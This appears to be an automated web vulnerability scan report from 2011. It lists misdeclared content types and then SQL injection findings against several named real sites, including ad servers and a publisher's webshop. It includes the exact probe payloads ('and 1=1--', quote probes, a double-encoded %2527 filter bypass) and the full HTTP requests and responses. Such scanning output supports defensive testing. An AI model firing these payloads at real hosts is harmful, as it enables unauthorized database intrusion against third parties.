30.85. http://www.pcai.com/web/ai_info/web/buttons/hpsearch2.gif

30.86. http://www.pcai.com/web/ai_info/web/buttons/hpservices2.gif

30.87. http://www.rpi.edu/dept/chem-eng/Biotech-Environ/EXPERT/expmed.html

30.88. http://www.wtec.org/loyola/kb/c1_s1.htm

30.89. http://www.yoox.com/_partners/luxury24/luxury24_210x195.html

31. Content type incorrectly stated

31.1. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

31.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

31.3. http://geoisp.alice.it/settacookie.html

31.4. http://geoisp.alice.it/virgilio/local/create_alice_vlocal_city_cookie.html

31.5. http://geoisp.virgilio.it/geo.php

31.6. http://imagesdotcom.ilsole24ore.com/images2010/SoleOnLine5/Z_Metabox/marketing/Z_Immagini/cedolare%20secca.png

31.7. http://kundenportal.aperto.de/download/zanox/zanox_intro_en.m4v

31.8. http://mail.alice.it/favicon.ico

31.9. http://mightyblue.com/images/windowsserver.gif

31.10. http://modelli-listini.motori.ansa.it/confrontoIndex2.php

31.11. http://nxtck.com/act.php

31.12. https://seal.verisign.com/getseal

31.13. http://techtarget-www.baynote.net/baynote/tags3/common

31.14. http://translate.googleapis.com/translate_a/t

31.15. http://webshop.elsevier.com/framework/cf/ga.cfm

31.16. https://webshop.elsevier.com/framework/cf/ga.cfm

31.17. http://www.ansa.it/web/banner_js/ansa_banner_array.js

31.18. http://www.ansa.it/web/banner_js/msn_banner_array.js

31.19. http://www.ansa.it/web/video/visual.swf

31.20. http://www.autostrade.it/autostrade/service.do

31.21. http://www.difesa.it/sites/archive2/sitecollectionimages/6b4ab7a7-8d36-4529-929c-1e490f70c6e0/93f9e344-cca4-41a4-9b9f-7a7b9682db3e01Medium.jpg

31.22. http://www.difesa.it/sites/archive2/sitecollectionimages/79555011-0a2d-4a2a-9bf2-152ae4aaa117/64389b1d-4203-4207-8f35-604d9317fcb2foto1Medium.jpg

31.23. http://www.difesa.it/sites/archive2/sitecollectionimages/803a045a-610a-4c96-a9a4-475055b67359/1b9b6072-9cb1-4bd5-a0b6-38f08d29fde3zeffiro_torna_a%20_casa_1Medium.jpg

31.24. http://www.difesa.it/sites/archive2/sitecollectionimages/90897531-8ddb-4507-a827-416bdc32b6ac/8d3e95ae-3152-47a8-a9cd-646f83d021ebsts134-s-002Medium.jpg

31.25. http://www.elsevier.com/authored_framework/images/buttons/ordernow.gif

31.26. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissuestab.html

31.27. http://www.eni.com/en_IT/static/flash/homepage_eni_com/visore_header/params.xml

31.28. http://www.eni.com/en_IT/static/flash/homepage_eni_com/visore_header/widgets/xml/reporter/media-box-2-link.xml

31.29. http://www.eni.com/en_IT/static/images/arrow_cerca_footer.gif

31.30. http://www.eni.com/login/LoginServletOSSO

31.31. https://www.eni.com/attachments/images/highslide/graphics/zoomout.cur

31.32. https://www.eni.com/en_IT/static/images/arrow_cerca_footer.gif

31.33. https://www.eni.com/login/LoginServletOSSO

31.34. http://www.ilsole24ore.com/_community/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/par/comments.kaptcha.png/69

31.35. http://www.ilsole24ore.com/_community/content/usergenerated/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/comments/gia_leggendo_l_artic.kaptcha.png/65

31.36. http://www.ilsole24ore.com/_community/content/usergenerated/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/comments/oltretutto_la_fotoe.kaptcha.png/76

31.37. http://www.ilsole24ore.com/php/piuletti/Dotcom2010/dotcom.php

31.38. http://www.ilsole24ore.com/php/piuletti/artratingsvc.php

31.39. http://www.ilsole24ore.com/sez2010/finanza-e-mercati/json/FinanzaMercatiUser/dati_JSON_OPT.json

31.40. http://www.luxury24.ilsole24ore.com/favicon.ico

31.41. http://www.shopping24.ilsole24ore.com/sh4/img/ico-prezzo-periodici.gif

31.42. http://www.shopping24.ilsole24ore.com/sh4/img/ico-prezzo-serviziOnLine.gif

31.43. http://www.telecomitalia.it/ip_presence/

31.44. http://www.telepass.it/AutostradeETIWeb/immagineSpazio

31.45. http://www.webank.it/favicon.ico

31.46. https://www.webank.it/favicon.ico

31.47. https://www.webank.it/webankpub/wb/generaIMG.do

31.48. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

32. Content type is not specified



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [PluID parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The PluID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the PluID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0%20and%201%3d1--%20&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBofaIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0a0; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:14 GMT
Connection: close
Content-Length: 1823

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
place(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5133839).replace(/\[%tp_flightid%\]/ig,2492235).replace(/\[%tp_campaignid%\]/ig,148561);}var ebO = new Object();ebO.w=728;ebO.h=90;ebO.ai=5133839;ebO.pi=0;ebO.d=0;ebO.rnd=4066534413148;ebO.title="";ebO.bt=1;ebO.bv=7.000000;ebO.plt=9;ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.suntech-solar-modules.com/it/commercio"));ebO.iu=escape("Site-34815/Type-0/de0f7579-78e7-4996-8618-33b0aaf929e9.gif");ebO.fu=escape("Site-34815/Type-2/acf62f6b-0918-4a46-85af-ee217e095bae.swf");ebO.fv=9;ebO.ta="-1";ebO.dg="-1";var ebFN="StdBanner";if(0==1)ebFN+="Ex";if(ebO.d)ebFN+="Debug";var ebSrc=ebBigS+"/SBTemplates"+ebSBTemplatesVer+"/"+ebFN+".js?ai=5133839";document.write("<scr"+"ipt src="+ebSrc+"></scr"+"ipt>");var ebAdID=5133839;var ebPli=2492235;var ebDSGID=-1;/* StdSupported */

Request 2

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0%20and%201%3d2--%20&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBoraIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=ba3832db-cb6f-4b2e-a42b-136199543bde3HU050; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:14 GMT
Connection: close
Content-Length: 1833

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
place(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5133851).replace(/\[%tp_flightid%\]/ig,2492235).replace(/\[%tp_campaignid%\]/ig,148561);}var ebO = new Object();ebO.w=728;ebO.h=90;ebO.ai=5133851;ebO.pi=0;ebO.d=0;ebO.rnd=406651141914324;ebO.title="";ebO.bt=1;ebO.bv=7.000000;ebO.plt=9;ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.suntech-solar-modules.com/it/proprietario_casa"));ebO.iu=escape("Site-34815/Type-0/fbf5b323-ff67-49a9-bd5b-8817d7f9a7e5.gif");ebO.fu=escape("Site-34815/Type-2/756a1454-a298-43ff-bffb-9c60d99fd7df.swf");ebO.fv=9;ebO.ta="-1";ebO.dg="-1";var ebFN="StdBanner";if(0==1)ebFN+="Ex";if(ebO.d)ebFN+="Debug";var ebSrc=ebBigS+"/SBTemplates"+ebSBTemplatesVer+"/"+ebFN+".js?ai=5133851";document.write("<scr"+"ipt src="+ebSrc+"></scr"+"ipt>");var ebAdID=5133851;var ebPli=2492235;var ebDSGID=-1;/* StdSupported */

1.2. http://expertsystem.net/page.asp [idd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://expertsystem.net
Path:   /page.asp

Issue detail

The idd parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the idd parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /page.asp?id=1519&idd=155' HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
Referer: http://expertsystem.net/clienti_dettaglio.asp?cd550
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; __utmc=151171949; __utmb=151171949.1.10.1304392426

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:40:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 584
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-7074224334010734&output=js&lmt=1304416766&num_ads=3'&channel=xxxxxxxxxx&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=it&url=http%3A%2F%2Fwww.ilsole24ore.com%2Fart%2Fnotizie%2F2011-05-02%2Fmorte-bin-laden-pakistan-afghanistan-093710.shtml%3Fuuid%3DAaXmPfTD&adsafe=high&dt=1304398765345&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304398766162&frm=0&adk=2511670684&ga_vid=1902530322.1304398766&ga_sid=1304398766&ga_hid=1663585310&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1058&bih=867&ref=http%3A%2F%2Fwww.ilsole24ore.com%2F%3Frefresh_ce&fu=0&ifi=1&dtd=883 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 00:09:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 20506

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
&amp;adurl=http://www.grammarly.com/%3Fq%3Dgrammar";
google_ad.visible_url = "www.Grammarly.com/Grammar_Checker";
google_ad.line1 = "Instant Grammar Checker";
google_ad.line2 = "Correct All Grammar Errors And";
google_ad.line3 = "Enhance Your Writing. Try Now!";
google_ad.regionname = "";
google_ads[18] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://ww
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7074224334010734&output=js&lmt=1304416766&num_ads=3''&channel=xxxxxxxxxx&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=it&url=http%3A%2F%2Fwww.ilsole24ore.com%2Fart%2Fnotizie%2F2011-05-02%2Fmorte-bin-laden-pakistan-afghanistan-093710.shtml%3Fuuid%3DAaXmPfTD&adsafe=high&dt=1304398765345&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304398766162&frm=0&adk=2511670684&ga_vid=1902530322.1304398766&ga_sid=1304398766&ga_hid=1663585310&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1058&bih=867&ref=http%3A%2F%2Fwww.ilsole24ore.com%2F%3Frefresh_ce&fu=0&ifi=1&dtd=883 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 00:09:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 754

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x
...[SNIP]...

1.4. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The clicktag parameter appears to be vulnerable to SQL injection attacks. The payloads 13256991'%20or%201%3d1--%20 and 13256991'%20or%201%3d2--%20 were each submitted in the clicktag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d1--%20&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:30 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3388

window['wbo_params'] = {
id: 146,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',

...[SNIP]...
496052&C=21277&P=37169&CREA=146&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21081006_gds-ieobanner-box-13-di-16gds-ieobanner-box-7-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304377530'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C
...[SNIP]...

Request 2

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d2--%20&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:30 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3372

window['wbo_params'] = {
id: 56,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',

...[SNIP]...
=496052&C=21277&P=37169&CREA=56&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080930_gds-ieobanner-box-13-di-16gds-ieobanner-box-13-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304377530'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=212
...[SNIP]...

1.5. http://webshop.elsevier.com/myarticleservices/booklets/ [product_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://webshop.elsevier.com
Path:   /myarticleservices/booklets/

Issue detail

The product_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the product_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the product_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /myarticleservices/booklets/?product_id=4556%2527 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
